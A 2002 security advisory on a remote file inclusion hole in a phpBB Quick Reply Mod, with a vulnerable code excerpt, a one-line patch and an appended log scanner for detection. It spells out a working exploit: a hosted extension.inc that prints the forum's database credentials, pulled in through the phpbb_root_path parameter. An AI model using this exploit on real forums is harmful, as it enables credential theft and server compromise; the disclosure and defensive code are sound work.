
Code Injection in phpBB Advanced Quick Reply Mod

by Nikola Strahija on November 13th, 2002 A security hole (code injection) was found in this software. You can download the software at http://phpbbhacks.com/viewhack.php?id=586. Attackers can exploit this Mod to inject code and compromise your forum, your website or your server (local exploit), because code injection is a dangerous technique.


Exploit: (quick_reply.php)


if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}


You can then create a PHP file named 'extension.inc' to be included, which gives access to that forum. Example:

<?php
include('config'.'.php');
echo "DB Type: $dbms\n";
echo "DB Host: $dbhost\n";
echo "DB Name: $dbname\n";
echo "DB User: $dbuser\n";
echo "DB Pass: $dbpasswd\n";
exit;
?>

After that, you upload this file to your server (http://[Your Server]/extension.inc) and enter the URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smilies
You will receive all the DB information of the forum.


Patch: (quick_reply.php)

[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
$phpbb_root_path = "./";
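As a defender-side illustration (added here; not part of the original advisory or the Mod's code), the following Python scans web-server access-log lines for requests that try to override phpbb_root_path with a remote URL or a traversal path, applying the same rule the patch enforces: only a local relative path is acceptable. The log lines, IP addresses and function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (not taken from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Nov/2002:10:01:02 +0000] "GET /forum/quick_reply.php?mode=smilies HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.11 - - [13/Nov/2002:10:01:05 +0000] "GET /forum/quick_reply.php?phpbb_root_path=http://198.51.100.7/&mode=smilies HTTP/1.0" 200 804 "-" "Mozilla/4.0"
192.0.2.12 - - [13/Nov/2002:10:01:09 +0000] "GET /forum/quick_reply.php?phpbb_root_path=../../../tmp/&mode=smilies HTTP/1.0" 200 804 "-" "Mozilla/4.0"
192.0.2.13 - - [13/Nov/2002:10:02:00 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.0" 200 9001 "-" "Mozilla/4.0"
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def is_safe_root_path(value: str) -> bool:
    """Mirror the patch's intent: the include root must be a local relative
    path, so reject anything with a scheme, a host, a leading slash or '..'."""
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return False
    if value.startswith("/") or ".." in value.split("/"):
        return False
    return True


def flag_rfi_attempts(log_text: str) -> list:
    """Return (client_ip, offending_value) pairs for requests whose
    phpbb_root_path parameter is not a safe relative path."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get("phpbb_root_path", []):
            if not is_safe_root_path(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in flag_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} tried to set phpbb_root_path={value!r}")
```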

